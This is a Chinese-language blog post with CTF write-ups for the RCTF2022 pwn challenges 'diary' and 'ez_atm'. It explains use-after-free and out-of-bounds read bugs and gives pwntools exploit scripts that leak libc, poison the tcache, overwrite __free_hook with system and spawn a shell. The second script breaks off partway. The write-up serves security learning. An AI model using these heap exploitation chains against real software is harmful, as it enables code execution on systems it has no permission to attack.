<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="196082">
    
    <title>
        
            RCTF2022复现 |
        
        196082&#39;s blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/ufo.ico">
    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/font/css/regular.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/font/css/solid.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/font/css/brands.min.css">
    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"196082.github.io","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"196082's blog","author":196082,"avatar":"/images/ling.JPG","logo":"/images/ling.JPG","favicon":"/images/ufo.ico"},"menu":{"home":"/","archives":"/archives","tags":"/tags","categories":"/categories"},"first_screen":{"enable":false,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"Keep writing and Keep loving.","hitokoto":false},"social_contact":{"enable":false,"links":{"github":null,"weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":false,"percent":false,"hide_header":true},"home":{"announcement":"浅浅更新博客一下吧~","category":true,"tag":true,"post_datetime":"updated"},"post":{"author_badge":{"enable":true,"level_badge":false,"custom_badge":"慢慢好起来"},"word_count":{"wordcount":true,"min2read":true},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false,"share":false,"reward":{"enable":true,"img_link":"/images/reward.jpg","text":"激励牛马，加速创作！","icon":"fa-solid fa-mug-hot"},"img_align":"center"},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"local_search":{"enable":true,"preload":true},"comment":{"enable":true,"use":"valine","valine":{"appid":"OcvtJuJHDrSFIyDGdp3rLMtA-gzGzoHsz","appkey":"C672AAYGXMkHxztf8ntdLShs","server_urls":null,"placeholder":"😜若有问题请各位大师傅留言评论"},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.36"},"waline":{"server_url":null,"reaction":false,"version":"3.2.1"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":true},"lazyload":{"enable":true},"cdn":{"enable":true,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2020,"word_count":true,"site_deploy":{"enable":true,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{},"version":"4.2.2"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 5.4.2"><link rel="alternate" href="/atom.xml" title="196082's blog" type="application/atom+xml">
</head>


<body>
<div class="progress-bar-container">
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/ling.JPG">
                </a>
            
            <a class="site-name border-box" href="/">
               196082&#39;s blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                首页
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                归档
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/tags">
                                
                                标签
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/categories">
                                
                                分类
                                
                            </a>
                            
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="menu-text-color fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                            首页
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                            归档
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/tags">
                            
                            标签
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/categories">
                            
                            分类
                        </a>
                        
                    </label>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        RCTF2022复现
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/ling.JPG">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">196082</span>
                                
                                    <span class="author-badge">慢慢好起来</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2023-04-22 13:35:06</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Mon Apr 24 2023 20:39:40 GMT+0800">2023-04-24 20:39:40</span>
            </span>
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/">比赛复现</a></li>
                        
                    
                </ul>
            </span>
        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/UAF/">UAF</a></li>
                        
                    
                </ul>
            </span>
        

        
        
            <span class="meta-info-item post-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>2.9k 字</span>
            </span>
        
        
            <span class="meta-info-item post-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>16 分钟</span>
            </span>
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <h2 id="diary"><a href="#diary" class="headerlink" title="diary"></a>diary</h2><h3 id="利用分析"><a href="#利用分析" class="headerlink" title="利用分析"></a>利用分析</h3><p>就是一道很正常的用户态堆题。在<code>delete</code>函数中存在UAF漏洞。</p>
<p>不过题目的逆向过程比较麻烦，加之我开始没注意到题目已经给了输入command的格式，如果注意到的话动态调试来逆向更为简单。</p>
<p>题目很简单，利用UAF使得<code>tcache</code>和<code>unsorted bin</code>中同时存在一个chunk，泄漏出libc地址。利用<code>encrypt</code>函数分配到<code>unsorted bin</code>中的chunk进而修改到tcache中chunk的fd指针指向<code>__free_hook</code>即可。</p>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">r = process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.terminal = [<span class="string">&#x27;tmux&#x27;</span>, <span class="string">&#x27;splitw&#x27;</span>, <span class="string">&#x27;-h&#x27;</span>]</span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create</span>(<span class="params">idx, content</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;input your test cmd:&#x27;</span>)</span><br><span class="line">    payload = <span class="string">&#x27;add#1#1#1#1#1#&#123;&#125;#&#123;&#125;&#x27;</span>.<span class="built_in">format</span>(<span class="built_in">str</span>(idx), content)</span><br><span class="line">    payload = <span class="built_in">bytes</span>(payload, encoding=<span class="string">&#x27;utf8&#x27;</span>)</span><br><span class="line">    r.sendline(payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">update</span>(<span class="params">idx, content</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;input your test cmd:&#x27;</span>)</span><br><span class="line">    payload = <span class="string">&#x27;update#&#123;&#125;#&#123;&#125;&#x27;</span>.<span class="built_in">format</span>(<span class="built_in">str</span>(idx), content)</span><br><span class="line">    payload = <span class="built_in">bytes</span>(payload, encoding=<span class="string">&#x27;utf8&#x27;</span>)</span><br><span class="line">    r.sendline(payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">idx</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;input your test cmd:&#x27;</span>)</span><br><span class="line">    payload = <span class="string">&#x27;show#&#123;&#125;&#x27;</span>.<span class="built_in">format</span>(<span class="built_in">str</span>(idx))</span><br><span class="line">    payload = <span class="built_in">bytes</span>(payload, encoding=<span class="string">&#x27;utf8&#x27;</span>)</span><br><span class="line">    r.sendline(payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params">idx</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;input your test cmd:&#x27;</span>)</span><br><span class="line">    payload = <span class="string">&#x27;delete#&#123;&#125;&#x27;</span>.<span class="built_in">format</span>(<span class="built_in">str</span>(idx))</span><br><span class="line">    payload = <span class="built_in">bytes</span>(payload, encoding=<span class="string">&#x27;utf8&#x27;</span>)</span><br><span class="line">    r.sendline(payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">encrypt</span>(<span class="params">idx, offset, length</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;input your test cmd:&#x27;</span>)</span><br><span class="line">    payload = <span class="string">&#x27;encrypt#&#123;&#125;#&#123;&#125;#&#123;&#125;&#x27;</span>.<span class="built_in">format</span>(<span class="built_in">str</span>(idx), <span class="built_in">str</span>(offset), <span class="built_in">str</span>(length))</span><br><span class="line">    payload = <span class="built_in">bytes</span>(payload, encoding=<span class="string">&#x27;utf8&#x27;</span>)</span><br><span class="line">    r.sendline(payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">11</span>):</span><br><span class="line">    create(i, <span class="built_in">str</span>(i))</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>):</span><br><span class="line">    delete(<span class="number">10</span>-i)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">show(<span class="number">3</span>)</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;1.1.1 1:1:4\n&#x27;</span>)</span><br><span class="line">heap_base = u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>)) - <span class="number">0x13a30</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;heap_base:&quot;</span>, <span class="built_in">hex</span>(heap_base))</span><br><span class="line">update(<span class="number">3</span>, <span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">show(<span class="number">2</span>)</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;1.1.1 1:1:4\n&#x27;</span>)</span><br><span class="line">libc_base = u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>)) - <span class="number">0x1ecbe0</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;libc_base:&quot;</span>, <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">free_hook = libc_base+<span class="number">0x1eee48</span></span><br><span class="line">system_addr = libc_base + libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">bin_sh_addr = libc_base + <span class="built_in">next</span>(libc.search(<span class="string">b&#x27;/bin/sh&#x27;</span>))</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">b&#x27;input your test cmd:&#x27;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;update#0#&#x27;</span> + flat(free_hook-<span class="number">4</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">encrypt(<span class="number">0</span>, <span class="number">4</span>, <span class="number">6</span>)</span><br><span class="line">update(<span class="number">0</span>, <span class="string">&#x27;A&#x27;</span>*(<span class="number">0x2c0</span>-<span class="number">0x16</span>))</span><br><span class="line">create(<span class="number">40</span>, <span class="string">&#x27;/bin/sh;&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;input your test cmd:&#x27;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;add#1#1#1#1#1#41#&#x27;</span>+flat(system_addr)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line">delete(<span class="number">3</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(r)</span></span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<p>这道题我在下面这个位置这里破防了，一直无法<code>double free</code>我还以为是glibc中检查了又不报错，去翻了源码发现会有报错，这才看了题目这里居然有这样一个验证属于是有点儿恶心人了。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">_BOOL8 __fastcall <span class="title">sub_43CC</span><span class="params">(__int64 a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">memcmp</span>(*(<span class="keyword">const</span> <span class="keyword">void</span> **)(a1 + <span class="number">0x10</span>), <span class="string">&quot;    &quot;</span>, <span class="number">4uLL</span>) == <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> __fastcall <span class="title">sub_4194</span><span class="params">(__int64 a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">if</span> ( *(_QWORD *)(a1 + <span class="number">0x10</span>) &amp;&amp; (<span class="keyword">unsigned</span> __int8)sub_43CC(a1) )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( *(_QWORD *)(a1 + <span class="number">0x10</span>) )</span><br><span class="line">      <span class="keyword">operator</span> <span class="keyword">delete</span>[](*(<span class="keyword">void</span> **)(a1 + <span class="number">0x10</span>));</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="ez-atm"><a href="#ez-atm" class="headerlink" title="ez_atm"></a>ez_atm</h2><h3 id="利用分析-1"><a href="#利用分析-1" class="headerlink" title="利用分析"></a>利用分析</h3><p>题目难度依旧不是很大，但是我没想明白的是，一开始我可以gdb去调试服务端程序，但是后面却一直卡在accept了，有大佬知道的话可以留言告诉我一下怎么回事。也正是因为这道题目比较简单才可以在不调试的情况下直接打。</p>
<p>这道题逆向分析过程也不算很难，存在三处漏洞。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">stat_query</span><span class="params">(__int64 a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  reply_message(<span class="number">1</span>, a1);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">1LL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个函数中返回的依旧是<code>0x84</code>个字节，所以就可以读取到返回地址也就是libc上的地址了，从而拿到libc地址。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 <span class="title">query</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  reply_message(<span class="number">1</span>, user_list[user_id]);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">2LL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>第二处跟第一处类似，不同的是这里是越界读取堆上的内容，那么可以泄漏出堆地址。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 <span class="title">cancellation</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> i; <span class="comment">// [rsp+Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">5</span>; i &gt; <span class="number">0</span>; --i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( check_passwrod(user_id, &amp;password) )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">free</span>((<span class="keyword">void</span> *)user_list[user_id]);</span><br><span class="line">      user_id = <span class="number">-1</span>;</span><br><span class="line">      reply_message(<span class="number">1</span>, (__int64)<span class="string">&quot;The target account has been cancelled.&quot;</span>);</span><br><span class="line">      <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( i != <span class="number">1</span> )</span><br><span class="line">      reply_message(<span class="number">2</span>, (__int64)<span class="string">&quot;password error.Try again.&quot;</span>);</span><br><span class="line">    get_message();</span><br><span class="line">  &#125;</span><br><span class="line">  reply_message(</span><br><span class="line">    <span class="number">0</span>,</span><br><span class="line">    (__int64)<span class="string">&quot;The password has been entered incorrectly for more than 5 times, and your account has been frozen.&quot;</span>);</span><br><span class="line">  *(_DWORD *)(user_list[user_id] + <span class="number">0x2C</span>LL) = <span class="number">1</span>;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>第三处则是这里在free之后没有清空指针引起的UAF。</p>
<p>所以利用思路就是先泄漏libc地址，再泄漏heap地址，最后利用UAF篡改<code>tcache</code>中chunk的fd到<code>__free_hook</code>即可。</p>
<h3 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> cdll</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">r = remote(<span class="string">&#x27;0.0.0.0&#x27;</span>, <span class="number">3339</span>)</span><br><span class="line"><span class="comment"># r = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.terminal = [<span class="string">&#x27;tmux&#x27;</span>, <span class="string">&#x27;splitw&#x27;</span>, <span class="string">&#x27;-h&#x27;</span>]</span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_random</span>(<span class="params">random</span>):</span></span><br><span class="line">    <span class="keyword">if</span> random &lt;= <span class="number">9</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0x30</span>+random</span><br><span class="line">    <span class="keyword">if</span> random == <span class="number">10</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0x61</span></span><br><span class="line">    <span class="keyword">if</span> random == <span class="number">11</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0x62</span></span><br><span class="line">    <span class="keyword">if</span> random == <span class="number">12</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0x63</span></span><br><span class="line">    <span class="keyword">if</span> random == <span class="number">13</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0x64</span></span><br><span class="line">    <span class="keyword">if</span> random == <span class="number">14</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0x65</span></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0x30</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">seed = u32(r.recv(<span class="number">4</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(seed))</span><br><span class="line">objdll = cdll.LoadLibrary(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line">objdll.srand(seed)</span><br><span class="line">uuid = <span class="string">&#x27;yxyxyx-xyyx-4xyx4-xyyx-xyyyyxy&#x27;</span></span><br><span class="line">uuid = <span class="built_in">list</span>(uuid)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x1d</span> + <span class="number">1</span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">ord</span>(uuid[i]) != <span class="number">52</span> <span class="keyword">and</span> <span class="built_in">ord</span>(uuid[i]) != <span class="number">45</span>:</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">ord</span>(uuid[i]) == <span class="number">0x78</span>:</span><br><span class="line">            random_num = objdll.rand() % <span 